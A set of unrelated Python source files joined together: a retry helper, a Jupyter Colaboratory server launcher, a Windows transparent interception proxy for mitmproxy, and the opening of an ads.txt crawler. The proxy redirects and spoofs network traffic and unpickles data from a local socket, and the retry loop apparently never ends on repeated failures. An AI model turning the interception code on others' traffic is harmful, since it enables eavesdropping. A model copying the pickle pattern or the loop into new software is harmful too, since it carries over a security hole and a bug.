:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=None):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while mtries > 1:
try:
if logger:
logger.debug('{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger.debug('{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger.debug(str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
|
colaboratory.py
|
# coding: utf-8
"""Colaboratory: the Jupyter Collaborative Computational Laboratory.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import errno
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import webbrowser
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Colaboratory requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.log import LogFormatter
from IPython.html import DEFAULT_STATIC_FILES_PATH
from IPython.html.log import log_request
from IPython.html.services.kernels.kernelmanager import MappingKernelManager
from IPython.html.base.handlers import FileFindHandler
from IPython.config.application import catch_config_error
from IPython.core.application import (
BaseIPythonApplication, base_flags, base_aliases,
)
from IPython.core.profiledir import ProfileDir
from IPython.kernel import KernelManager
from IPython.kernel.zmq.session import default_secure, Session
from IPython.utils.importstring import import_item
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName,
)
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
pjoin = os.path.join
here = os.path.dirname(__file__)
RESOURCES = pjoin(here, 'resources')
_examples = """
colab # start the server
colab --profile=sympy # use the sympy profile
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class SingleStaticFileHandler(web.StaticFileHandler):
def get_absolute_path(self, root, path):
p = os.path.abspath(os.path.join(self.root, self.default_filename))
return p
class ColaboratoryWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(ColaboratoryWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
session_manager,
log, settings_overrides,
jinja_env_options=None):
template_path = settings_overrides.get("template_path", os.path.join(os.path.dirname(__file__), "templates"))
jenv_opt = jinja_env_options if jinja_env_options else {}
env = Environment(loader=FileSystemLoader(template_path),**jenv_opt )
settings = dict(
# basics
log_function=log_request,
base_url='/',
template_path=template_path,
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url='/login',
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
session_manager=session_manager,
# IPython stuff
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
here = os.path.dirname(__file__)
colab = pjoin(RESOURCES, 'colab')
handlers = [(r'/', web.RedirectHandler, {'url':'/welcome'}),
(r'/welcome(/?)', SingleStaticFileHandler,
{'path': colab, 'default_filename': 'welcome.html'}),
(r'/notebook(/?)', SingleStaticFileHandler,
{'path': colab, 'default_filename': 'notebook.html'}),
(r'/colab/(.*)', web.StaticFileHandler,
{'path': colab}),
(r'/extern/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'extern')}),
(r'/closure/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'closure-library', 'closure', 'goog')}),
(r'/ipython/(.*)', FileFindHandler,
{'path': [pjoin(RESOURCES, 'ipython_patch'), DEFAULT_STATIC_FILES_PATH]}),
]
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
return handlers
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'ColaboratoryApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
# Add notebook manager flags
aliases = dict(base_aliases)
aliases.update({
'ip': 'ColaboratoryApp.ip',
'port': 'ColaboratoryApp.port',
'port-retries': 'ColaboratoryApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'ColaboratoryApp.keyfile',
'certfile': 'ColaboratoryApp.certfile',
'browser': 'ColaboratoryApp.browser',
})
#-----------------------------------------------------------------------------
# ColaboratoryApp
#-----------------------------------------------------------------------------
class ColaboratoryApp(BaseIPythonApplication):
name = 'jupyter-colaboratory'
description = """
The Jupyter Colaboratory.
This launches a Tornado based HTML Server that can run local Jupyter
kernels while storing the notebook files in Google Drive, supporting
real-time collaborative editing of the notebooks.
"""
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, ProfileDir, Session, MappingKernelManager,
]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
_log_formatter_cls = LogFormatter
def _log_level_default(self):
return logging.INFO
def _log_datefmt_default(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# Network related information.
ip = Unicode('127.0.0.1', config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8844, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
def _cookie_secret_default(self):
return os.urandom(1024)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(ColaboratoryApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
jinja_environment_options = Dict(config=True,
help="Supply extra arguments that will be passed to Jinja environment.")
notebook_manager_class = DottedObjectName('IPython.html.services.notebooks.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.'
)
kernel_manager_class = DottedObjectName('IPython.html.services.kernels.kernelmanager.MappingKernelManager',
config=True,
help='The kernel manager class to use.'
)
session_manager_class = DottedObjectName('IPython.html.services.sessions.sessionmanager.SessionManager',
config=True,
help='The session manager class to use.'
)
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL")
)
info_file = Unicode()
def _info_file_default(self):
info_file = "nbserver-%s.json"%os.getpid()
return os.path.join(self.profile_dir.security_dir, info_file)
def init_kernel_argv(self):
"""construct the kernel arguments"""
# Kernel should get *absolute* path to profile directory
self.kernel_argv = ["--profile-dir", self.profile_dir.location]
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
kls = import_item(self.kernel_manager_class)
self.kernel_manager = kls(
parent=self, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(parent=self, log=self.log)
kls = import_item(self.session_manager_class)
self.session_manager = kls(parent=self, log=self.log)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = ColaboratoryWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.session_manager,
self.log, self.webapp_settings,
self.jinja_environment_options
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This "
"is not recommended.")
if not self.password:
self.log.critical(warning + " and not using authentication. "
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info('The port %i is already in use, trying another random port.' % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warn("Permission to listen on port %i denied" % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
@property
def display_url(self):
ip = self.ip if self.ip else '[all ip addresses on your system]'
return self._url(ip)
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i" % (proto, ip, self.port)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info('interrupted')
print(self.notebook_info())
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y') and 'n' not in line.lower():
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print("No answer for 5s:", end=' ')
print("resuming operation...")
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
status = submodule.check_submodule_status()
if status == 'missing':
self.log.warn("components submodule missing, running `git submodule update`")
submodule.update_submodules(submodule.ipython_parent())
elif status == 'unclean':
self.log.warn("components submodule unclean, you may see 404s on static/components")
self.log.warn("run `setup.py submodule` or `git submodule update` to update")
@catch_config_error
def initialize(self, argv=None):
super(ColaboratoryApp, self).initialize(argv)
self.init_logging()
self.init_kernel_argv()
self.init_configurables()
self.init_components()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
info = self.notebook_manager.info_string() + "\n"
info += "%d active kernels \n" % len(self.kernel_manager._kernels)
return info + "The IPython Notebook is running at: %s" % self.display_url
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'secure': bool(self.certfile),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def start(self):
""" Start the IPython Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
if self.subapp is not None:
return self.subapp.start()
info = self.log.info
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).")
self.write_server_info_file()
if self.open_browser:
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if browser:
b = lambda : browser.open(self.connection_url,
new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
self.remove_server_info_file()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
launch_new_instance = ColaboratoryApp.launch_instance
|
windows.py
|
import collections
import ctypes
import ctypes.wintypes
import os
import socket
import struct
import threading
import time
import configargparse
from pydivert import enum
from pydivert import windivert
from six.moves import cPickle as pickle
from six.moves import socketserver
PROXY_API_PORT = 8085
class Resolver(object):
def __init__(self):
TransparentProxy.setup()
self.socket = None
self.lock = threading.RLock()
self._connect()
def _connect(self):
if self.socket:
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect(("127.0.0.1", PROXY_API_PORT))
self.wfile = self.socket.makefile('wb')
self.rfile = self.socket.makefile('rb')
pickle.dump(os.getpid(), self.wfile)
def original_addr(self, csock):
client = csock.getpeername()[:2]
with self.lock:
try:
pickle.dump(client, self.wfile)
self.wfile.flush()
addr = pickle.load(self.rfile)
if addr is None:
raise RuntimeError("Cannot resolve original destination.")
addr = list(addr)
addr[0] = str(addr[0])
addr = tuple(addr)
return addr
except (EOFError, socket.error):
self._connect()
return self.original_addr(csock)
class APIRequestHandler(socketserver.StreamRequestHandler):
"""
TransparentProxy API: Returns the pickled server address, port tuple
for each received pickled client address, port tuple.
"""
def handle(self):
proxifier = self.server.proxifier
pid = None
try:
pid = pickle.load(self.rfile)
if pid is not None:
proxifier.trusted_pids.add(pid)
while True:
client = pickle.load(self.rfile)
server = proxifier.client_server_map.get(client, None)
pickle.dump(server, self.wfile)
self.wfile.flush()
except (EOFError, socket.error):
proxifier.trusted_pids.discard(pid)
class APIServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, proxifier, *args, **kwargs):
socketserver.TCPServer.__init__(self, *args, **kwargs)
self.proxifier = proxifier
self.daemon_threads = True
# Windows error.h
ERROR_INSUFFICIENT_BUFFER = 0x7A
# http://msdn.microsoft.com/en-us/library/windows/desktop/bb485761(v=vs.85).aspx
class MIB_TCPROW2(ctypes.Structure):
_fields_ = [
('dwState', ctypes.wintypes.DWORD),
('dwLocalAddr', ctypes.wintypes.DWORD),
('dwLocalPort', ctypes.wintypes.DWORD),
('dwRemoteAddr', ctypes.wintypes.DWORD),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
('dwOffloadState', ctypes.wintypes.DWORD)
]
# http://msdn.microsoft.com/en-us/library/windows/desktop/bb485772(v=vs.85).aspx
def MIB_TCPTABLE2(size):
class _MIB_TCPTABLE2(ctypes.Structure):
_fields_ = [('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCPROW2 * size)]
return _MIB_TCPTABLE2()
class TransparentProxy(object):
"""
Transparent Windows Proxy for mitmproxy based on WinDivert/PyDivert.
Requires elevated (admin) privileges. Can be started separately by manually running the file.
This module can be used to intercept and redirect all traffic that is forwarded by the user's machine and
traffic sent from the machine itself.
How it works:
(1) First, we intercept all packages that match our filter (destination port 80 and 443 by default).
We both consider traffic that is forwarded by the OS (WinDivert's NETWORK_FORWARD layer) as well as traffic
sent from the local machine (WinDivert's NETWORK layer). In the case of traffic from the local machine, we need to
distinguish between traffc sent from applications and traffic sent from the proxy. To accomplish this, we use
Windows' GetTcpTable2 syscall to determine the source application's PID.
For each intercepted package, we
1. Store the source -> destination mapping (address and port)
2. Remove the package from the network (by not reinjecting it).
3. Re-inject the package into the local network stack, but with the destination address changed to the proxy.
(2) Next, the proxy receives the forwarded packet, but does not know the real destination yet (which we overwrote
with the proxy's address). On Linux, we would now call getsockopt(SO_ORIGINAL_DST), but that unfortunately doesn't
work on Windows. However, we still have the correct source information. As a workaround, we now access the forward
module's API (see APIRequestHandler), submit the source information and get the actual destination back (which the
forward module stored in (1.3)).
(3) The proxy now establish the upstream connection as usual.
(4) Finally, the proxy sends the response back to the client. To make it work, we need to change the packet's source
address back to the original destination (using the mapping from (1.3)), to which the client believes he is talking
to.
Limitations:
- No IPv6 support. (Pull Requests welcome)
- TCP ports do not get re-used simulateously on the client, i.e. the proxy will fail if application X
connects to example.com and example.org from 192.168.0.42:4242 simultaneously. This could be mitigated by
introducing unique "meta-addresses" which mitmproxy sees, but this would remove the correct client info from
mitmproxy.
"""
def __init__(self,
mode="both",
redirect_ports=(80, 443), custom_filter=None,
proxy_addr=False, proxy_port=8080,
api_host="localhost", api_port=PROXY_API_PORT,
cache_size=65536):
"""
:param mode: Redirection operation mode: "forward" to only redirect forwarded packets, "local" to only redirect
packets originating from the local machine, "both" to redirect both.
:param redirect_ports: if the destination port is in this tuple, the requests are redirected to the proxy.
:param custom_filter: specify a custom WinDivert filter to select packets that should be intercepted. Overrides
redirect_ports setting.
:param proxy_addr: IP address of the proxy (IP within a network, 127.0.0.1 does not work). By default,
this is detected automatically.
:param proxy_port: Port the proxy is listenting on.
:param api_host: Host the forward module API is listening on.
:param api_port: Port the forward module API is listening on.
:param cache_size: Maximum number of connection tuples that are stored. Only relevant in very high
load scenarios.
"""
if proxy_port in redirect_ports:
raise ValueError("The proxy port must not be a redirect port.")
if not proxy_addr:
# Auto-Detect local IP.
# https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
proxy_addr = s.getsockname()[0]
s.close()
self.mode = mode
self.proxy_addr, self.proxy_port = proxy_addr, proxy_port
self.connection_cache_size = cache_size
self.client_server_map = collections.OrderedDict()
self.api = APIServer(self, (api_host, api_port), APIRequestHandler)
self.api_thread = threading.Thread(target=self.api.serve_forever)
self.api_thread.daemon = True
self.driver = windivert.WinDivert()
self.driver.register()
self.request_filter = custom_filter or " or ".join(
("tcp.DstPort == %d" %
p) for p in redirect_ports)
self.request_forward_handle = None
self.request_forward_thread = threading.Thread(
target=self.request_forward)
self.request_forward_thread.daemon = True
self.addr_pid_map = dict()
self.trusted_pids = set()
self.tcptable2 = MIB_TCPTABLE2(0)
self.tcptable2_size = ctypes.wintypes.DWORD(0)
self.request_local_handle = None
self.request_local_thread = threading.Thread(target=self.request_local)
self.request_local_thread.daemon = True
# The proxy server responds to the client. To the client,
# this response should look like it has been sent by the real target
self.response_filter = "outbound and tcp.SrcPort == %d" % proxy_port
self.response_handle = None
self.response_thread = threading.Thread(target=self.response)
self.response_thread.daemon = True
self.icmp_handle = None
@classmethod
def setup(cls):
# TODO: Make sure that server can be killed cleanly. That's a bit difficult as we don't have access to
# controller.should_exit when this is called.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_unavailable = s.connect_ex(("127.0.0.1", PROXY_API_PORT))
if server_unavailable:
proxifier = TransparentProxy()
proxifier.start()
def start(self):
self.api_thread.start()
# Block all ICMP requests (which are sent on Windows by default).
# In layman's terms: If we don't do this, our proxy machine tells the client that it can directly connect to the
# real gateway if they are on the same network.
self.icmp_handle = self.driver.open_handle(
filter="icmp",
layer=enum.Layer.NETWORK,
flags=enum.Flag.DROP)
self.response_handle = self.driver.open_handle(
filter=self.response_filter,
layer=enum.Layer.NETWORK)
self.response_thread.start()
if self.mode == "forward" or self.mode == "both":
self.request_forward_handle = self.driver.open_handle(
filter=self.request_filter,
layer=enum.Layer.NETWORK_FORWARD)
self.request_forward_thread.start()
if self.mode == "local" or self.mode == "both":
self.request_local_handle = self.driver.open_handle(
filter=self.request_filter,
layer=enum.Layer.NETWORK)
self.request_local_thread.start()
def shutdown(self):
if self.mode == "local" or self.mode == "both":
self.request_local_handle.close()
if self.mode == "forward" or self.mode == "both":
self.request_forward_handle.close()
self.response_handle.close()
self.icmp_handle.close()
self.api.shutdown()
def recv(self, handle):
"""
Convenience function that receives a packet from the passed handler and handles error codes.
If the process has been shut down, (None, None) is returned.
"""
try:
raw_packet, metadata = handle.recv()
return self.driver.parse_packet(raw_packet), metadata
except WindowsError as e:
if e.winerror == 995:
return None, None
else:
raise
def fetch_pids(self):
ret = ctypes.windll.iphlpapi.GetTcpTable2(
ctypes.byref(
self.tcptable2), ctypes.byref(
self.tcptable2_size), 0)
if ret == ERROR_INSUFFICIENT_BUFFER:
self.tcptable2 = MIB_TCPTABLE2(self.tcptable2_size.value)
self.fetch_pids()
elif ret == 0:
for row in self.tcptable2.table[:self.tcptable2.dwNumEntries]:
local = (
socket.inet_ntoa(struct.pack('L', row.dwLocalAddr)),
socket.htons(row.dwLocalPort)
)
self.addr_pid_map[local] = row.dwOwningPid
else:
raise RuntimeError("Unknown GetTcpTable2 return code: %s" % ret)
def request_local(self):
while True:
packet, metadata = self.recv(self.request_local_handle)
if not packet:
return
client = (packet.src_addr, packet.src_port)
if client not in self.addr_pid_map:
self.fetch_pids()
# If this fails, we most likely have a connection from an external client to
# a local server on 80/443. In this, case we always want to proxy
# the request.
pid = self.addr_pid_map.get(client, None)
if pid not in self.trusted_pids:
self._request(packet, metadata)
else:
self.request_local_handle.send((packet.raw, metadata))
def request_forward(self):
"""
Redirect packages to the proxy
"""
while True:
packet, metadata = self.recv(self.request_forward_handle)
if not packet:
return
self._request(packet, metadata)
def _request(self, packet, metadata):
# print(" * Redirect client -> server to proxy")
# print("%s:%s -> %s:%s" % (packet.src_addr, packet.src_port, packet.dst_addr, packet.dst_port))
client = (packet.src_addr, packet.src_port)
server = (packet.dst_addr, packet.dst_port)
if client in self.client_server_map:
# Force re-add to mark as "newest" entry in the dict.
del self.client_server_map[client]
while len(self.client_server_map) > self.connection_cache_size:
self.client_server_map.popitem(False)
self.client_server_map[client] = server
packet.dst_addr, packet.dst_port = self.proxy_addr, self.proxy_port
metadata.direction = enum.Direction.INBOUND
packet = self.driver.update_packet_checksums(packet)
# Use any handle thats on the NETWORK layer - request_local may be
# unavailable.
self.response_handle.send((packet.raw, metadata))
def response(self):
"""
Spoof source address of packets send from the proxy to the client
"""
while True:
packet, metadata = self.recv(self.response_handle)
if not packet:
return
# If the proxy responds to the client, let the client believe the target server sent the packets.
# print(" * Adjust proxy -> client")
client = (packet.dst_addr, packet.dst_port)
server = self.client_server_map.get(client, None)
if server:
packet.src_addr, packet.src_port = server
else:
print("Warning: Previously unseen connection from proxy to %s:%s." % client)
packet = self.driver.update_packet_checksums(packet)
self.response_handle.send((packet.raw, metadata))
if __name__ == "__main__":
parser = configargparse.ArgumentParser(
description="Windows Transparent Proxy")
parser.add_argument(
'--mode',
choices=[
'forward',
'local',
'both'],
default="both",
help='redirection operation mode: "forward" to only redirect forwarded packets, '
'"local" to only redirect packets originating from the local machine')
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--redirect-ports",
nargs="+",
type=int,
default=[
80,
443],
metavar="80",
help="ports that should be forwarded to the proxy")
group.add_argument(
"--custom-filter",
default=None,
metavar="WINDIVERT_FILTER",
help="Custom WinDivert interception rule.")
parser.add_argument("--proxy-addr", default=False,
help="Proxy Server Address")
parser.add_argument("--proxy-port", type=int, default=8080,
help="Proxy Server Port")
parser.add_argument("--api-host", default="localhost",
help="API hostname to bind to")
parser.add_argument("--api-port", type=int, default=PROXY_API_PORT,
help="API port")
parser.add_argument("--cache-size", type=int, default=65536,
help="Maximum connection cache size")
options = parser.parse_args()
proxy = TransparentProxy(**vars(options))
proxy.start()
print(" * Transparent proxy active.")
print(" Filter: {0}".format(proxy.request_filter))
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print(" * Shutting down...")
proxy.shutdown()
print(" * Shut down.")
|
main.py
|
import asyncio
import datetime
import json
import logging
import queue
import threading
from typing import List
from elasticsearch import Elasticsearch
from sqlalchemy import create_engine
from sqlalchemy.exc import SQLAlchemyError, DBAPIError
from sqlalchemy.orm import sessionmaker
import validators
import adstxt.fetch as fetch
import adstxt.models as models
import adstxt.transform as transform
LOG = logging.getLogger(__name__)
class AdsTxtCrawler:
def __init__(self,
es,
file,
db_uri,
es_uri=None,
es_query=None,
es_index=None,
file_uri=None,
crawler_id=None):
self.es = es
self.file = file
self.db_uri = db_uri
self.es_uri = es_uri
self.es_query = es_query
self.es_index = es_index
self.file_uri = file_uri
self.crawler_id = crawler_id
self._session = sessionmaker()
self._testing = False
self.es = Elasticsearch(self.es_uri)
def _get_engine(self):
if 'mysql+pymysql' in self.db_uri:
connect_args = {'init_command': "SET @@collation_connection"
"='utf8mb4_unicode_ci'"}
LOG.info('Using connection string of %r and args of %r',
self.db_uri, connect_args)
return create_engine(self.db_uri,
pool_size=40,
connect_args=connect_args)
else:
LOG.info('Using local sqllite.')
connect_args = {}
return create_engine(self.db_uri,
connect_args=connect_args)
def _bootstrap_db(self):
"""Bootstrap the data stores, and create a shared session
object with the engine setup."""
self.engine = self._get_engine()
# Generate a root session object, this is configured locally
# and then shared. Each user of this will then scope their
# own session.
session = sessionmaker()
session.configure(bind=self.engine)
LOG.debug('Building tables.')
models.Base.metadata.create_all(self.engine)
LOG.debug('Built database.')
# Share our root session object.
self._session = session
def _last_updated_at(self, domain: str) -> datetime.datetime:
session = self._session()
# Check to see if the domain is present in the domains table.
db_domain = session.query(
models.Domain).filter_by(name=domain).first()
if not db_domain:
# Write it with a min time so we update it this first session.
db_domain = models.Domain(name=domain,
last_updated=datetime.datetime.min)
session.add(db_domain)
session.commit()
# Return last updated at time.
return db_domain.last_updated
def _check_viability(self, domain: str) -> bool:
"""Check to see if a domain is viable to be crawled.
Basic validation goes on here, first we assert that the domain
is infact a valid domain, with a TLD and more info. From here we
check to see if we've crawled the domain recently.datetime
Args:
domain (str): domain to precheck.
Returns:
bool: Truthy if a domain is viable to be scanned again,
Falsy if the domain has already been scanned or
does not pass validation.
"""
if not validators.domain(domain):
LOG.info('%r found to be an invalid domain.', domain)
return False
# Check to see if the domain is present in the domains table.
last_updated = self._last_updated_at(domain)
# Check to see when we last updated the domains data.
# If the last updated time was greater than an six hours ago, check.
# TODO: We should get the cache control headers back off the page
# and use that instead. Set as 6 hours for the moment.
if (datetime.datetime.utcnow() -
last_updated < datetime.timedelta(minutes=360)):
# Skip to next domain as this ones got new data.
LOG.debug('Skipping %r domain due to recent update at %r',
domain, last_updated)
return False
return True
def process_domain(self, fetchdata: fetch.FetchResponse) -> None:
"""Process a domains FetchResponse into inserted records and variables.
Pipeline roughly goes as follows.
1. Check FetchResponse data is valid, if not update scraped_at
and return. If it is valid, update the db_domain details we have.
2. Iterate through response tuple, checking what's currently in the
database so we don't insert duplicate records.
3. Try to commit
Args:
fetchdata (FetchResponse): Named tuple of fetch data.
Returns:
None
"""
# Setup a new SQL session.
session = self._session(bind=self.engine)
# Fetch domain from database. This should always exist and will
# raise an sqlalchemy.orm.exc.NoResultFound if nothing is found.
db_domain = session.query(
models.Domain).filter_by(name=fetchdata.domain).one()
LOG.debug('Processing fetchdata for %r', fetchdata.domain)
LOG.debug('Using %r as db_domain.', db_domain)
# If we've got bad data from an endpoint, log this and return.
if not fetchdata.response or not fetchdata.adstxt_present:
# TODO: Passback more debug data on failure from fetches.
LOG.debug('Bad AdsTxt file found, updating TTLs and returning.')
# Update the last updated at row so we don't try and
# update the record again too soon.
db_domain.last_updated = fetchdata.scraped_at
# This is set to null at creation, explicitly set to False as we
# know that there is not one now.
